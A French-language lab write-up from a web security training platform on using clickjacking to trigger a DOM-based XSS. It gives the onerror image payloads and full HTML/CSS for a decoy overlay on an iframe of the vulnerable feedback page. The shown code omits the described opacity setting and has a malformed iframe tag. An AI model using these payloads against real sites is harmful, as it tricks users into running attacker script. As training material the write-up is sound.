Exploitation clickjacking pour déclencher une XSS DOM

Exploiting clickjacking vulnerability to trigger DOM-based XSS

Lab: Exploiting clickjacking vulnerability to trigger DOM-based XSS | Web Security AcademyWebSecAcademy

Objectif

Tromper un utilisateur pour qu’il clique sur un bouton (« Click me ») embarqué dans un iframe afin d’exécuter la fonction print() via une vulnérabilité XSS déclenchée par clic.

Contexte / Observations

Le formulaire feedback comporte un paramètre name vulnérable à une XSS DOM (le payload JavaScript s’exécute quand l’image échoue et invoque la fonction souhaitée).
Exemple de payload détecté : &name=<img src=0 onerror=print()>.

<img src=0 onerror=alert(0)>

Les autres paramètres utiles pour préremplir le formulaire dans l’iframe : email, subject, message.

Charge utile (payload) utilisée

Pour déclencher print() via la vulnérabilité dans name :

<img src=0 onerror=print()>

Inclure un <iframe> pointant vers la page vulnérable /feedback avec les paramètres préremplis (name, email, subject, message) contenant le payload XSS.

?name=jordan&[email protected]&subject=hacked&message=hack

Rendre l’iframe quasiment invisible (opacité très basse) et superposer un leurre (“Click”) au-dessus, positionné pour que le clic de la victime atteigne le bouton « Click me » à l’intérieur de l’iframe.
Quand la victime clique sur le leurre, le clic est transmis à l’iframe et la XSS DOM est déclenchée — ici print() est appelée.

Exemple de code à héberger sur l’exploit server

<style>
iframe{
width: 1000px;
height:900px;
}
div{
position: relative;
top: 830px;
left: 80px;
}
</style>
<div>Click</div>
<iframe src="https://0a6200db035e811c815e804300ac0083.web-security-academy.net/feedback?name=%3Cimg%20src=0%20onerror=print()%3E&[email protected]&subject=hacked&message=hack"</iframe>

Mis à jour il y a 1 mois

Ce contenu vous a-t-il été utile ?